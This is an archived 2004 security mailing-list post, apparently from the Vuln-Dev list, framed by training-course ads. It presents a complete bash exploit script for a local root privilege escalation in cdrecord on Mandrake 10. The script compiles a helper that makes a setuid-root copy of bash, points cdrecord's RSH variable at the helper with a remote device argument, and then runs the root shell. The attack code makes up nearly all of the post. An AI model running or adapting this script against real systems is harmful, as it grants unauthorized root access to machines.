Network Security: Detailed info on cdrecord local root exploit

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Vuln-Dev

[Top] [All Lists]

cdrecord local root exploit

from [newbug Tseng] Network Security

[Permanent Link]

Subject:	cdrecord local root exploit
Date:	10 Sep 2004 01:30:17 -0000



#!/bin/bash

echo "cdr-exp.sh -- CDRecord local exploit ( Tested on cdrecord-2.01-0.a27.2mdk 
+ Mandrake10)"
echo "Author    : newbug [at] chroot.org"
echo "IRC       : irc.chroot.org #chroot"
echo "Date      :09.09.2004"

cd /tmp
cat > s.c <<_EOF_
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main()
{
        setuid(0);setgid(0);
        chown("/tmp/ss", 0, 0);
        chmod("/tmp/ss", 04755);

        return 0;
}

_EOF_

cat > ss.c <<_EOF_
#include <stdio.h>

int main()
{
        setuid(0);setgid(0);
        execl("/bin/bash","bash",(char *)0);

        return 0;
}
_EOF_

gcc -o s s.c
gcc -o ss ss.c

export RSH=/tmp/s
cdrecord  dev=REMOTE:newbug@brk.chroot.org:0,0,0 /blah/blah >/dev/null 2>&1
/tmp/ss

[More with this subject...]

<Prev in Thread]	Current Thread	[Next in Thread>
cdrecord local root exploit, newbug Tseng <= Re: cdrecord local root exploit, Sean Davis Message not available Re: cdrecord local root exploit, Sean Davis Re: cdrecord local root exploit, Volker Kuhlmann Message not available Re: cdrecord local root exploit, Jason T. Miller Re: cdrecord local root exploit, Dr Andrew C Aitchison Re: cdrecord local root exploit, Jason T. Miller

Previous by Date:	Remote buffer overflow in Apache mod_ssl when reverse proxying SSL, Jérôme
Next by Date:	New Data Wipe Tools, Thomas C. Greene
Previous by Thread:	Remote buffer overflow in Apache mod_ssl when reverse proxying SSL, Jérôme
Next by Thread:	Re: cdrecord local root exploit, Sean Davis
Indexes:	[Date] [Thread] [Top] [All Lists]